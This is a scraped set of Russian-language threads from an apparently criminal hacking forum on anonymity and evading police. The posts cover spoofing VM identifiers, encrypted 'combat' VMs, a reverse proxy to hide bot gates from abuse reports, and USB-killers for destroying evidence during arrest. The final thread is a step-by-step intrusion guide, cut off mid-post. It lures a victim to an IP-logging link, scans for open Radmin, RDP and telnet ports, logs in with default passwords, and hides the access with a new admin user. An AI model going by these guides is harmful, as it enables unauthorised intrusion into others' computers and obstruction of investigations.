Ииии, тут пусто, даже в течении суток не было не одного запроса. Выходит, что браузерам Chrome и Firefox не обязательна та информация, которую они запрашивают.
Немного отвлеклись информацией о браузерах и вернемся к теме статьи. Так как эти идентификаторы находятся в «открытом доступе» ОС, поэтому любой софт спокойно сможет запросить информацию и сделать привязку к железу. Тогда пропадает понятие анонимности в целом, ведь совокупность идентификаторов дает точное представление о истории пользователя, не зависимо от браузера или мессенджера. И что нам дает виртуальная машина? Подмену идентификаторов, ведь виртуальное железо будет иметь отличие от реального. Также нужно понимать, что все идентификаторы виртуальной машины все равно будут неизменны. И при запуске приложение может жестко привязаться к виртуальному железу. Чтобы этого не происходило нужно прибегать к некой хитрости, которая сможет аннулировать почти все идентификаторы и заполнить их новыми значениями. Ничего скачивать не нужно, в Windows утилита эта уже есть. И находится она по адресу C:\Windows\System32\Sysprep\sysprep.exe. запуская ее ставим галочку generalize и ждем окончания. После перезагрузки появится окно установки Windows

В котором указываем имя компьютера, имя пользователя и ждем завершения настройки параметров. Теперь посмотрим, что изменилось
CIM_Display

CIM_OperatingSystem

Win32_BIOS

Win32_OperatingSystem

Win32_ComputerSystemProduct

В итоге мы не изменили серийные номера, в том числе БИОС. Да, все идентификаторы всех устройств были обновлены. Но как же выйти из ситуации, если sysprep’а не хватает? Изнутри системы изменить их не получится, поэтому будем менять снаружи с помощью powershell.
Откроем консоль от имени администратора и впишем некий скрипт на создание новой машины
New-VM -name "111some name" -Generation 2 -MemoryStartupBytes 1024MB -VHDPath "D:\test powershell\test w8.vhdx" -SwitchName "VNC Network"
Полагаю, что тут все ясно, и некие значения подставляем свои. Это лишь пример скрипта, а powershell очень гибкий инструмент и способен полностью автоматизировать создание новой и удаление старой машины. Список команд для гипервизора docs.microsoft.com/en-us/powershell/module/hyper-v/. Нужно заготовить виртуальный диск с примененным sysprep’ом (в самом окне выбрать выключение, а не перезагрузку). Диск оставляем и не изменяем, и каждый раз копируем, затем монтируем к новой виртуальной машине. И процесс копирования можно и нужно автоматизировать.
Создадим новую виртуальную машину и проверим данные идентификаторы.
Win32_BIOS

Win32_ComputerSystemProduct

Наконец-то, они будут отличатся от прежних. Поэтому каждый раз нужно создавать новую виртуальную машину, доустанавливать Windows, потом установить сам браузер (остальной софт можно установить и настроить до sysprep’a).

Книга «Как я украл миллион»

ID: 676533bbb4103b69df371a30
Thread ID: 45133
Created: 2020-12-03T11:39:00+0000
Last Post: 2023-08-04T06:45:25+0000
Author: R3SET
Prefix: Мануал/Книга
Replies: 27 Views: 5K

Автор| Сергей Павлович
---|---
Количество страниц| 400 стр. 26 иллюстраций
Серия| Документальная литература

В ходе расследования крупнейшего хищения персональной информации за всю историю США в поле зрения следствия попал белорусский гражданин Сергей Павлович, который признан виновным в продаже данных краденых банковских карт. В 2008 году группе из 11 человек, являвшихся гражданами разных стран, были предъявлены обвинения в ряде преступлений, связанных с незаконным проникновением в компьютерные сети торговых компаний и кражей данных со 170 миллионов кредитных карт. Мозгом этих операций был Альберт Гонсалес, осведомитель американских спецслужб. По утверждениям властей США, ущерб от действий «11 друзей Гонсалеса» превысил миллиард долларов США.

Книга основана на реальных событиях и написана автором во время отбывания 10-летнего срока тюремного заключения.

Скачать:

Hidden content for authorized users.

million.pdf - AnonFiles

anonfiles.com

MAT или как по-беспонтовой не попалиться (метаданные, exif, итд)

ID: 676533bbb4103b69df371a85
Thread ID: 33514
Created: 2019-11-27T20:40:00+0000
Last Post: 2023-02-15T16:34:23+0000
Author: AnonX0x0
Replies: 16 Views: 5K

Сегодня свежим андроидом, яблоком и т.д. никого не удивишь. Эти гаджеты многофункциональные устройства, а значит с их помощью можно сделать фото и отправить ее собеседнику на почту, выложить на сайт, ну или просто хранить у себя на жестком. По умолчанию их формат .jpeg, как правило. Но самое плохое тут то, что при должном анализе такого изображения (не важно какого формата), можно узнать много интересной информации (модель телефона, путь к изображению, имя хоста, время, дата и т.д.). И чаще всего таким "разузнаванием" занимаются уполномоченные на это органы.

Как не оставить никаких следов, выкладывая изображение на хост, форум???

Программа MAT. Она существует как в GUI, так и в консольном варианте (кому как удобнее). Смысл этой проги в том, что она сначала дает нам исчерпывающий ответ на то, какими метаданными обладает изображение. Прога разделяет их на две группы: грязные и чистые. После скана, грязные файлы можно легко почистить, удалив тем самым все метаданные.
Теперь можно выкладывать изображение и не боятся.
Линк на офф сайт:

MAT: Metadata Anonymisation Toolkit

mat.boum.org

Для программ не поддерживающих работу через прокси

ID: 676533bbb4103b69df371df8
Thread ID: 9370
Created: 2006-06-22T13:41:59+0000
Last Post: 2006-07-13T15:08:02+0000
Author: _@Oleg@_
Replies: 11 Views: 5K

Подскажите, существуют ли такие программы для программ не поддерживающих работу через прокси. Желательно бесплатно
Заранее спасибо!

VeraCrypt&Whonix или как избежать набутыливания если бутылка уже у твоей двери наперевес с болгаркой

ID: 676533bbb4103b69df371b63
Thread ID: 55613
Created: 2021-08-20T19:00:22+0000
Last Post: 2022-01-06T15:53:15+0000
Author: Dook
Prefix: Статья
Replies: 23 Views: 5K

Я ни кого не побуждаю к действиям, всё ниже сказанное больная фантазия автора, любые совпадения случайны.

ГЛАВА 1
Патриоты,Путинка,Подготовка устройств

Категорически приветствую
Как новорег потерявший прошлый аккаунт решил обобщить некоторые ответы на вопросы в одну тему, дабы сделать что то полезное для Junior-хецкеров
Зайдя сегодня на форум нарвался на статью http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/54947/
Автор статьи отлично всё разложил для новичков,но как по мне этого вам хватит на пол года пока вы обучаетесь, но после вам пора принимать более серьёзные меры защиты ваших похождений.
Хочу напомнить что работа по РУ не приветсвуется, и чтож вы за патриотры такие если пьёте Путинку а сами... эх.... ну вы поняли)
И так, на борту мы имеем ваше личное железо и желание обезопасить себя от всем известной бутылки капиталистов в лице органов власти.
Для начала нам нужно где то раздобыть носитель информации объёмом от 120+ Гб, с поддержкой USB 3.0, или же SSD/HDD если у вас стационарный ПК и вы не закрываете крышку системника.
Первым на перво нам надо избавиться от всех пропролитарных ПО и ОС на вашем железе, советую на этом этапе копировать куда нибудь все важные документы/фото и т.д вне вашего рабочего пространства.
Я более чем уверен что ты сейчас используете виндовс, поэтому качаем небольшую тулзу Rufus https://rufus.ie/ru/
Теперь идём качать Debian 10 https://www.debian.org/index.ru.html можете использовать любую OSunix но эта как по мне самая лучшая,хотя 11 ещё не тестил
Если вы находитесь на этом форуме то вам не составит труда разобраться с Rufus, разве что при старте нарезки нужно выбрать dd формат дабы не возникало проблем.
Теперь у нас есть флешка с накатаной СВОБОДНОЙ И ЧИСТОЙ os, вставляем её, перезагружаемся,заходим в BIOS ставим её первой на запуск, F10 и начнётся установка, при выборе куда ставить ОБЯЗАТЕЛЬНО нужно отформатировать все ваши разделы, думаю нет смысла объяснять зачем. Выбор GUI чистая вкусовщина, я использую KDE Plasma, но на выбор их там больше 5

Вуаля у нас новенькая os, без пропролитарных инструментов слежки, и прочего мусора навязанного корпорациями, теперь вы царь и бог в этой системе
Debian по умолчанию не поддерживает sudo, поэтому делаем следующее в нашем терминале

apt install sudo

nano /etc/sudoers

тут нам надо вставить под надписью "root ALL=(ALL:ALL) ALL" имя своего пользователя как показано на скриншоте, и сохранить Ctrl+O Ctrl+X Enter, всё у вас есть sudo

Теперь мы качаем VeraCrypt https://www.veracrypt.fr/en/Downloads.html
Если вы не хотите запариваться качаем для Linux с раширением tar.bz2
При открытиии вас встретит 4 установщика, выбираем gui-x64

Его мы и запускаем, со всем соглашаемся, после установки VeraCrypt далее VC можно будет найти по горячему поиску
После такой сложной работы, бахаем стопарик Путинки за кробу, запускаем VC и нас встречает вот такой граф.интерфейс

Теперь вставляем в ПК носитель о котором я говорил в начале статьи, лично у меня стоит HDD который я в студенческие годы отжал за долги
Если система увидела устройство выбираем кнопочку CreateVolume, и в выплывающем окне выбираем созданием тома для drive/partition

После нажатия вам предложит создаить обычный и скрытый раздел, если захотите разберётесь сами, в рамках статьи будем делать обычный раздел

В новом окне нажимаем SelectDevice и выбираем наш носитель который будем зашифровывать. Ибо у меня уже зашифрован, я не буду прилагать скриншоты, там уже интуитивно всё понятно будет,нужно будет согласится с форматированием, и придумать пароль, учитывая что мы спасаемся от набутыливания советую использовать очень мощный AES + sha256 шифрование (или 512 я не помню что там максимум) и очень мощные пароли по типу

~HhMWYsG*{NtWhzlGv@uXYOu~kj{H5
SisF1atseHepNDZvvpyxa0VrKD2bf6
DPn1FHU{8pNguf~8vnKaeJ3JLQwIDа

Пока что пароль сохраняем в обычном блокнотике, на этапе шифрования вам нужно будет возюкать курсором внутри окна VC дабы на основе рандома он ещё сильнее зашифровал ваш том, когда синяя полоска заполнится, можно будет нажимать Crypt, махнуть ещё стопарик Путинки за Линуса Торвальдса, закурить Петра, и сходить за бутылкой жигуля.
По истечению какогото времени вы получите пустой диск, зашифрованный по самые помидоры)
Теперь вы наверное хотите спросить "А что делать со всем этим добром?"
На этот диск мы и будем накатывать наши боевые виртуальные тачки, при помощи VirtualBox.

ГЛАВА2
Вирты

З.Ы Некоторые версии из данной инструкции могут устареть на момент когда вы будете читать данную статью, так что всегда проверяйте и обновляйте ваше ПО до последних версий, это очень важно!
На этом этапе лучше всего будет перезагрузить ваш комп, удостоверится что всё работает, пароль от тома VC сохранился.

Открвыем VC и выбираем любую цифру, после чего нажимаем кнопочку SelectDevice и выбираем устройтсво которое зашифровали, и жмякаем Mount (Монтировать)
Вводим пароль который мы сохраняли и нажимаем ОК, после чего потребуют пароль от sudo (достаточно будет пароля юзера которого мы добавили в sudo)
После пары секунд мы увидим что диск вмонтировался, и теперь мы уже имеем к нему доступ

Если всё прошло успешно, самое время устанавливать VirtualBox далее VB на нашу систему, сделать это крайне просто

sudo apt install virtualbox-6.1

После установки, запускам, и нас встречет стандартное окно VM
Я не хочу копипастить уже 100500 раз написаные статьи по установке и настройке Whonix в статье которую я вставил в начале всё хорошо описанно, за исключением того что используют Windows, не зря же мы от него избавлялись верно?) Оговорюсь что бы наши труды поимели результат при Импорте .ova от вхуникса, нужно выбрать носитель который мы зишифровали, и накатывать на него, тоже самое касается всех ваших машин. Лично я качаю все системы с раширением .ova (советую вам сделать так же) и я просто их импортирую на зашифрованный диск
Если вы не знаете где взять .ova скину вам сразу ссылку где можно скачать многострадальную kali с таким расширением <https://www.kali.org/get- kali/#kali-virtual-machines>
В сети есть тонны статей как настроить её на whonix, не хочу копипастить
Вроде бы всё, но тут наступает самое интересное для чего я захотел написать эту статью

ГЛАВА 3
Кто такой провайдер, и почему он твой враг

В своё время так получилось что работал аля принеси подай админом у одного из малоизвестных провайдеров.
Так вот даже у них стоят тригеры на TOR соединение, и для таких пользователей есть отдельные интерфейсы, и логирование каждого байта, страшно представить что с такими соединениями делает Ростелеком и другие корпорации желающие знать какого размера твой стручок, и сколько раз ты стряхнул...
VPN относятся проще, как минимум где я работал, на него закрывали глаза, в то время точно.
Уже давно не секрет что все популярные VPN сервисы по типу NordVPN являются методом заработка денег, и здать ваш реальный IP после того как ФЭСЫ нашли ваш входной узел Tor'а дело одной заявки, и вы ребята уже на бутылке, поэтому нам нужно арендовать VPS https://ru.wikipedia.org/wiki/VPS за анонимную крипту и настраивать своё собственное VPN подключение без логов,и шифрованием трафика, в стране где с РУ напряжённые отношения, но это тема отдельной статьи, и я напишу её когда будет много свободного времени. Вообще такие vps продают даже в пределах этого форума, лично я не пользовался, не знаю какой дают там доступ, но если вы лично не можете убедится в конфигурации системы, не советую их покупать. Но это выбор каждого, я ни чего не имею против данных ребят, даже поддерживаю.

ГЛАВА 4
Заключительная

Теперь можно выдохнуть, у нас есть защищённая "линия" и безопасность собственного железа если дверь уже пилят болгаркой, но СТОП, пароль же всё ещё в блокнотике на рабочем столе, что же делать?
Для начала переименовать фаилик под закос системного, и спрятать в глубине системы, выписать его на бумажку, и бумажку спрятать где то, но главное не в помещении где вы работаете, теперь можно написать скрипт по типу "Тревожной кнопки" который будет срабатывать моментально при неожиданном отключении вашего зашифрованного носителя и удалять фаилик с вашим паролем. Профит))) Если будут просьбы напишу такой скрипт в рамках статьи на Python.
Что касается анонимного и приватного общения, в том же злощастном телеграм, нам нужно будет покупать виртуальные номера за анонимную криптовалюту типо Monero, регистрировать аккаунт на нём, и теперь даже если он привяжет к вашему устройству ID от него не будет толку, главное не заходить в него с других мест, а лучше всего вообще не пользоваться пропролитарными мессенджарами и использовать Jabber/Tox , хороший сервер для жабы это @thesecure.biz, с TOX сами разберётесь.

Всем спасибо кто прочитал до конца

З.Ы Изначально хотел затронуть больше тем, но пока писал половину забыл, если вспомню дополню. В следующей статье когда прийдут с китая плюшки рассмотрим как сделать себя ещё анонимнее взломав роутер соседа)

Критика приветсвуется, если есть вопросы пишите в ПМ
Удачи, и будьте готовы ко всему

Написанно специально для xss.is

Google меня палит

ID: 676533bbb4103b69df371b9e
Thread ID: 27492
Created: 2019-01-27T10:35:27+0000
Last Post: 2021-10-03T16:54:21+0000
Author: lukas
Replies: 27 Views: 5K

Подскажите, как меня палит google? в строке местоположение - пишет мой реальный адрес (страна-город)
я под впн, все сервисы типа whoer, показывают полное отсутствие утечек

Есть вопрос по Vector T13 antidetect

ID: 676533bbb4103b69df371bc9
Thread ID: 50325
Created: 2021-04-05T18:56:00+0000
Last Post: 2021-08-02T22:40:52+0000
Author: xmenusa
Replies: 40 Views: 5K

Мне тут посоветовали, использовать данный продукт для своих целей, слышал что данный товарищ его разраб, бывший мусор, а как мы знаем бывших не бывает.
Кто нибудь имел дело с данным продуктом, в боевом режими под серьезные задачи?

Кто что скажет?

Занимайся расследованием киберпреступлений как рок-звезда (Взламываем планету | Книга 3) [Спарк Флоу]

ID: 676533bbb4103b69df371bee
Thread ID: 33984
Created: 2019-12-22T13:37:47+0000
Last Post: 2021-06-03T07:12:23+0000
Author: SecureX
Prefix: Мануал/Книга
Replies: 12 Views: 5K

Занимайся расследованием киберпреступлений как рок-звезда
(Взламываем планету | Книга 3)

Авторы : Sparc Flow
Переводчик: Ianuaria
Оригинальное название: How to Investigate Like a Rockstar
Объем в оригинале : 107 стр.
Тип перевода: перевод на русский
Формат: текст, PDF
Дата выдачи перевода: готов к выдаче
Уровень сложности материала: продвинутый

Описание:

"Есть два вида компаний: те, что были взломаны, и те, что пока еще не знают, что были взломаны".

Компания, которая попросила нас о помощи, обнаружила аномалию в своих самых критически важных системах.
Наша работа - провести глубокий криминалистический анализ, выполнить оценку угроз и раскрыть все вредоносные программы, оставленные хакерами.

Цифровая форензика

Мы следуем по отпечаткам атакующего через множество систем и воссоздаем хронологию заражения, чтобы разобраться с мотивами. Погружаемся глубже в анализ памяти, отрабатываем с копией диска, занимаемся поиском и обнаружением угроз, а также анализом малвари, попутно обсуждаем идеи по управлению инцидентами из реальной жизни.

Восстановление систем

И наконец, порешаем самые важные вопросы при любом реагировании на инциденты информационной безопасности: как выкинуть атакующих из систем и вернуть доверие тем машинам, что были скомпрометированы.

Для тех из вас, кто читал книги по хакингу типа "Искусство эксплойта" и "Занимайся хакингом с ловкостью порнозвезды", вы наконец ощутите, каково это - находиться по ту сторону файрвола!

Hidden content for authorized users.

<https://www.amazon.com/How-Investigate-Like-Rockstar-forensic- ebook/dp/B074THN82S/>

Скачать:

You must have at least 1 reaction(s) to view the content.

Как анонимно отправить почту

ID: 676533bbb4103b69df371c2f
Thread ID: 28467
Created: 2019-03-28T16:43:09+0000
Last Post: 2021-02-26T11:09:46+0000
Author: doge
Replies: 11 Views: 5K

Попался на глаза интересный сервис anonymousemail.me
С него можно отправлять письма не указывая вообще никаких данных и даже не регистрируясь.
У получателя будет отображаться как письмо от Anonymousemail <noreply@anonymousemail.me>
Тестили на gmail и нескольких 10-минутных ящиках - попало сразу во входящие, не в спам.

Настройка прокси для вашего сервера за 5 минут

ID: 676533bbb4103b69df371c32
Thread ID: 34448
Created: 2020-01-19T00:19:51+0000
Last Post: 2021-02-24T18:34:57+0000
Author: ANDROID
Prefix: Статья
Replies: 8 Views: 5K

example.com <=> PROXY <=> YOU_SERVER

Статья написана специально для тех, кто хочет скрыть гейты своих ботов за прокси серверами.

В: Для его это нужно?
О: Для того, чтобы абуза шла не на прямой ip адрес вашего сервера, а на адрес прокси сервера, который вы приобрели за 1-2$.

В: Где купить дешевые сервера под прокси?
О: http://poiskvps.ru/ (не реклама)

И так начнём. Я буду приводить пример настройки на deb (Debian) подобных дистрибутивах.

Для начала нам понадобится nginx, установим его:

apt-get install nginx

Click to expand...

Далее так как мы настраиваем не веб сайт, а прокси, отключаем дефолтный виртуальный хост

unlink /etc/nginx/sites-enabled/default

Click to expand...

После создаём новый файл в папке /etc/nginx/sites-available для ваших прокси с названием (например) reverse-proxy.conf.
Пишем в файле следующее:

Code:Copy to clipboard

server {
        listen 80;
        location / {
             proxy_pass http://20.30.40.50;
        }
}

Данная конфигурация довольно проста и не требует объяснений, кроме как вам нужно вместо 20.30.40.50 установить ip адрес вашего сервера.

Создадим симлинк для активации вашего конфига

ln -s /etc/nginx/sites-available/reverse-proxy.conf /etc/nginx/sites- enabled/reverse-proxy.conf

Click to expand...

Убедитесь что ваша конфигурация nginx не содержит ошибок и перезапустите его.

nginx -t

nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful

service nginx restart

Click to expand...

Теперь вы можете зайти на ip адрес вашего прокси сервера, и вы увидете страницу, которая находится на адресе 20.30.40.50 .

Всем удачной работы, и поменьше блокировок ваших серверов.

[FAQ] - Создаем связку VPN-TOR-VPN

ID: 676533bbb4103b69df371c67
Thread ID: 42699
Created: 2020-09-30T20:11:09+0000
Last Post: 2020-12-22T15:56:25+0000
Author: Barrasa
Prefix: Статья
Replies: 20 Views: 5K

vpntor копия.png

Всем здарова, вещает R0DR1G0F3RR4R1. Уверен каждый, кто читает эту статью, интересуется своей безопасностью и пытается улучшить свою связку. Сегодня мы пошагово создадим и настроим соединение "VPN-TOR-VPN ". Таким образом вы с нуля создадите довольно мощную и безопасную цепочку, распутать которую будет сложно.
По моему мнению, данная связка является одной из лучших, что может настроить новичок без особых навыков и умений. Но в любом случае, вам придется немного попотеть, так как этот процесс длиться довольно долго. Внимательно и постепенно прорабатывайте поданную информацию на деле, чтобы не похерить свои труды и время.

Переходим к настройке:

Источником интернета должен служить 4G модем, можете прикупить левую симку в переходе, оплатить пакет и пользоваться. Это уже обезопасит вас от взоров провайдера в вашу сторону.

Первым делом скачиваем и устанавливаем программу VirtualBox.
Ссылка для скачивания: https://www.virtualbox.org/wiki/Downloads

Далее переходим на Whonix и устанавливаем пакет для VirtualBox.
Прямая ссылка: https://www.whonix.org/wiki/VirtualBox

Как только скачали - двойным щелчком кликайте по образу и он автоматически подгрузится в ваш VirtualBox.

Настраиваем VirtualBox:

Далее качаем образ Windows 7 для виртуалки, можно установить здесь и устанавливаем её на VB. Для этого нажимаете "Создать", называете вашу машину как захотите, после - выбираете разрядность для вашей системы. После этого выбираем объем оперативной памяти, которую мы выделим для ее работы. Советую ставить от 1гб, здесь чем больше - тем лучше. Далее жмете "Создать виртуальный диск", тип диска выбираем VDI, динамический, и выделяем объем для жесткого диска системы. Тут сколько вам понадобится, я выделяю от 60гб. Далее запускаем систему, указываем образ и ждем пока все установится. Обычно это занимает около часа.

Настраиваем сеть:

Для начала выключаем виртуалки и переходим в главное меня VirtualBox-а.
Открываем вкладку "Сеть" и переключаем тип соединения с "NAT" на "Внутренняя сеть Whonix". Далее запускаем все виртуалки и переходим в
Windows 7. Через панель управления заходим в центр управления сетями, нажимаем "Изменение параметров адаптера", кликаем правой кнопкой мыши на подключении, настройка параметров IPv4 и прописываем следующие настройки:
IP-адрес: 10.152.152.50
Маска: 255.255.192.0
Шлюз: 10.152.152.10
Далее сохраняем заданные настройки.

Итоги:

Теперь ваша рабочая машина имеет доступ к интернету только через Whonix, он же TOR. Перед работой на своей домашней системе подключаемся к VPN-у, запускаем все виртуалки и на рабочей системе также запускаем VPN.
Таким образом мы создали соединение VPN-TOR-VPN , что является довольно сильной связкой, далее при желании можно вывести это подключение на дедик.

Анонимная телефонная связь

ID: 676533bbb4103b69df371c77
Thread ID: 39686
Created: 2020-07-16T13:36:37+0000
Last Post: 2020-11-28T00:09:24+0000
Author: Misha_Klg
Replies: 39 Views: 5K

Здравствуйте!

Подскажите решение (если оно есть). Нужно связаться с человеком живущем в Румынии. Есть его мобильный телефон. А так же подключенные к этому номеру популярные мессенджеры (Whatsapp, Viber, Telegram).

Вопрос: как я могу с ним связаться не засветив свой номер и местоположение (если будет пробивка)? Есть вариант остаться анонимным?

Анонимная связь через Telegram

ID: 676533bbb4103b69df371c8c
Thread ID: 40896
Created: 2020-08-14T07:32:46+0000
Last Post: 2020-10-26T23:17:04+0000
Author: Misha_Klg
Replies: 44 Views: 5K

Доброго дня!

Необходимо связаться через Telegram. Задача не выдать свое местоположение и страну в которой находишься.

Способ связи придуман такой: ноутбук Mac (есть старенький ноутбук, но он не тянет) - Virtual Box - Whonix - Telegram Desktop - возможно еще какие-то дополнительные VPN и Proxy - зарегистрировать аккаунт в Telegram на номер далекой страны через онлайн сервис приема сообщений - оплатить это анонимными монетами - кинуть трафик Telegarm через Tor.

Что скажете, насколько это анонимно?
Есть ли дыры в этой цепочке?

Заранее спасибо.

Простая, но самая уверенная схема для сохранения анонимности

ID: 676533bbb4103b69df371c96
Thread ID: 41969
Created: 2020-09-11T12:14:41+0000
Last Post: 2020-09-29T19:20:12+0000
Author: Neo0001
Replies: 44 Views: 5K

Интересно выслушать мнение других

Хорошо ли я защищен ?

ID: 676533bbb4103b69df371cb3
Thread ID: 40039
Created: 2020-07-26T13:40:34+0000
Last Post: 2020-08-03T13:47:35+0000
Author: MAS0N
Replies: 43 Views: 5K

В плане анонимности у меня базовые знание, поэтому хотелось бы получить оценку от гуру в этом деле. Хорошо ли я защищен ?

У меня есть физ сервер, к нему всегда подключаюсь через exspress vpn ( они вроде как хранят логи только, на момент пока действует подписка. чтобы доставлять обновление)ф На самом сервере нету абсолютно никаких нарушающих законодательство файлов, и программ. Но на том же сервере есть виртуалки с которых уже я уже промышляю разные дела. Сами виртуалки закриптованы через VeraCrypt.
Оцените такой уровень защиты, достаточно ли надежно?

Как узнать точное местоположение человека по ip (вопрос)

ID: 676533bbb4103b69df371cd8
Thread ID: 31043
Created: 2019-08-14T01:40:22+0000
Last Post: 2020-05-14T15:33:51+0000
Author: Jay4R
Replies: 23 Views: 5K

Как узнать точное местоположение человека по ip?
Кто может, убедительная просьба узнать точное местоположение данного ip
91.237.220.255

Экстренное уничтожение компьютера - BadUSB, USB-киллер

ID: 676533bbb4103b69df371ce9
Thread ID: 27472
Created: 2019-01-25T12:48:32+0000
Last Post: 2020-04-13T12:54:32+0000
Author: lukas
Replies: 11 Views: 5K

Экстренное уничтожение компьютера. Как хакеры обманывают криминалистов.

Вы, верно, не раз видели видео арестов и обысков у хакеров или иных киберпреступников, когда представители правоохранительных органов врываются в жилое помещение, включают компьютер и под запись демонстрируют неопровержимые доказательства преступной деятельности.

Вот одно из подобных видео:

С точки зрения современной форензики это неправильный подход. По научным канонам все устройства должны быть отключены от питания, запечатаны и исследованы в лаборатории специалистами. Хотя это неоднозначная рекомендация, так как те же системы электромагнитного уничтожения дисков умеют автоматически активироваться и уничтожать данные при смене положения системного блока с вертикального на горизонтальное.

Но все эти рекомендации игнорируются, так как соблазн получить признательные показания и доступы к устройствам, пока подозреваемый еще не отошел от шока, не получил консультацию адвоката или сокамерников, слишком велик.

И это приносит свои плоды: большинство пойманных врасплох киберпреступников выдают доступы к устройствам и указывают на улики, делая это в рамках сотрудничества, за которое им обещают максимально мягкий приговор (им, правда, не рассказывают, что приговор выносит суд, а не сотрудники полиции или следователь).

Обычно у человека со стороны, не интересующегося расследованиями преступлений хакеров, может возникнуть логичный вопрос: ведь есть шифрование операционной системы и криптоконтейнеры, почему хакеры его не используют?

Используют, но хакеру могут просто зажать палец дверью и получить пароль, потому шифрование – отличное решение в теории, а на практике лучше, чтобы выдавать пароль было просто не к чему.

Иногда на задержанного давят угрозой отправить в СИЗО до суда в случае отказа выдать данные и предлагают подписку о невыезде или домашний арест в случае согласия сотрудничать.

USB-киллер может решить проблему хакера: если подобное устройство, замаскированное под флешку, вставить в USB-порт, то оно необратимо выведет из строя материнскую плату, и компьютер «умрет». Но самое главное, на месте будет практически невозможно установить причину «смерти» компьютера, а хакер всегда сможет вздохнуть и сказать: «Эх, он давно на ладан дышал».

Вот видеодемонстрация уничтожения ноутбука:

USB-киллер не уничтожит жесткий диск, и в лаборатории его извлекут, но к тому времени у хакера уже будет адвокат и дело будет на этапе следствия, никто не станет засовывать палец в дверь или менять меру пресечения.

USB-киллеры можно найти в интернет-магазинах и на AliExpress. Подобная флешка кладется около компьютера, на нее наносится надпись, например «данные» или «материалы по работе» (задача этой надписи – привлечь внимание). Хакер может добровольно выдать флешку или дождаться, когда любопытные недоброжелатели сами вставят ее в устройство.

Конечно, есть небольшая вероятность, что они вставят ее в свое устройство, и тогда проблем не избежать. Но у задержанного хакера и так большие проблемы, а задача ловушки – вывести из строя компьютер с данными в тот момент, когда сам задержанный это сделать уже не сможет.

Где и как держать биткоины

ID: 676533bbb4103b69df371cec
Thread ID: 32765
Created: 2019-10-26T20:55:32+0000
Last Post: 2020-04-13T12:44:20+0000
Author: Crypto Locker
Replies: 18 Views: 5K

Серсис\горячий кошель?
Как называется?

Хочу услышать ваше мнение =)

Взлом ПК по IP

ID: 676533bbb4103b69df371cfa
Thread ID: 27061
Created: 2018-12-27T20:30:10+0000
Last Post: 2020-03-16T22:50:51+0000
Author: Hide
Replies: 9 Views: 5K

1.) Предисловие.

Для того чтобы пользоваться этим методом, надо определиться, нужно ли это Вам в реальности, или Вам хочется просто развлечь себя и доказать, что Вы — лучший(ая). Последнее было для меня стимулом для того чтобы все это проделывать, но теперь я многое понял, а главное — понял то, что взлом не должен проводится чтобы доказать окружающим тебя людям, что ты «кулхацкер». Каким я себя не считаю. Многому надо научиться, и после практики, если все получилось, на мой взгляд, не надо от нечего делать взламывать чужие компьютеры. Итак, надеюсь с целью все определились, перейдем к действию?

=============================================
2.) Узнаем IP.

Надеюсь ни для кого не секрет, что без IP, мы не сможем найти нужный нам компьютер, и следовательно — провести взлом. Так как же его узнать? (многие задаются этим вопросом и часто пишут мне на аську). Очень просто, нам потребуеются прямые руки, немного фантазии и онлайн сниффер.
Многие используют сниффер для увода cookies (куков, печенек, сессии — кому как нравится). Но в нашем случае, cookies нас не интересуют. Мы идем сюда и регистрируемся, если раньше этого не делали.

hacker-pro.net/sniffer/

Отлично. Пол дела сделано. Теперь идем в «настройки», при необходимости загружаем свое изображение. И нам дается ссылка на сниффер, с редиректом (перенаправлением) на нашу картинку. Не забудьте поставить галочку на «записывать IP в лог». Надеюсь поняли о чем я? Нет?! Тогда читайте.
Смысл в том, чтобы дать эту ссылку своей «жертве», но только со ссылкой cпрятанной в слове (изучаем html), а если в лом, то просто берете:

Здесь пишите любой текст, или одно слово

Пишите какой-нибудь текст (включайте фантазию). Возьмем самое простое:

===========
Здравствуйте! На Ваш E-mail адрес была отправлена открытка, чтобы посмотреть ее, нажмите сюда

Это было самое легкое, советую придумать что-то более оригинальней. Всю эту муть отправляете жертве. При желании можно использовать сервисы анонимной отправки почты, или залить php скрипт, и самому сделать такой сервис. Можете использовать мой, но я могу его в любой момент отключить:

mqil.su/message/

Все, осталось жертве ПЕРЕЙТИ «посмотреть картинку», как IP палится в логе.
Не надо ничего никуда вводить, как в случае с фейком. В итоге все довольны, он (она), получила свою открытку, а Вы IP.

=============================================
3.) Используем разные программы для анализа данных.

Теперь, у нас есть главное, без чего была бы невозможна дальнейшая работа. Дальнейшие действия — проверить хост (компьютер) на наличие уязвимостей — открытых портов. Я для этих целей пользуюсь сканером [XSpider 7.5], Вы можете использовать любой другой, на Ваш вкус. Но лучше всего использовать несколько сканеров, что не покажет один — покажет другой.

Сразу качаем себе [XSpider 7.5] отсюда — http://www.softportal.com/software-1453-xspider.html
Обновлять не рекомендую, так как версия крякнутая, и полностью рабочая.

Теперь когда Вы скачали его, необходимо его настроить — создать новый профиль. Кто-то на сайте описывал настройку профиля, но чтобы Вам не приходилось искать статью, я Вам опишу настройку.

Открываете сканер

Профиль
Новый…
Комментарий (пишите что хотите)
Идете на вкладку «Сканер Портов», и внизу рядом с надписью «default.prt» давите [...]
Выйдет окошко, давите «новый»
Пустой
В комментах пишите что угодно
внизу увидеть «добавить порты» и пишите «4899» и «3389»
Сохранить как «4899».
Дольше выходите обратно на вкладки, и снимаете отовсюду галки.

Точно также создаете еще 1 профиль, только порт 23. Все.

Теперь набираеаете IP своей жертвы, в поле «добавить хост» и начинаете сканировать. Если вдруг открытым оказался один из портов 4899 — Radmin, 23 — telnet, 3389 — Remote Desktop (удаленный рабочий стол) — пробуете законнектиться (подключиться). Пароль по дефолту 12345678, об этом уже писалось. Самое лучшее (для меня), когда открыт 4899 порт (Radmin). Подключились? Радуйтсь!
Дальше можете делать все что Вашей душе угодно. Дальше читать не обязательно.

Но, чтобы не палиться, рекомендую Вам убрать иконку в трее (рядом с часиками), и создать нового пользователя, с правами администратора. (об этом между прочим тоже писалось раньше) — не буду писать, а то статья очень большая получится.

Remote Desktop входит в стандартную комплектацию Windows.
RAdmin Viewer можете скачать тут — depositfiles.com/files/92m5usz2b
В нем же есть и telnet
P>S
RAdmin тоже входит в стандартную комплектацию.

Если не получилось подключиться, не отчаиваемся, читаем дальше.

=====================================================
4.) Если анализ ничего не дал?

Если он ничего не дал, то можно своими усилиями помочь себе. Делается это просто, серверная часть устанавливается на удаленный компьютер/открывается нужный порт с нужным логином и паролем. Конечно, но как установить/открыть, если компьютер далеко???

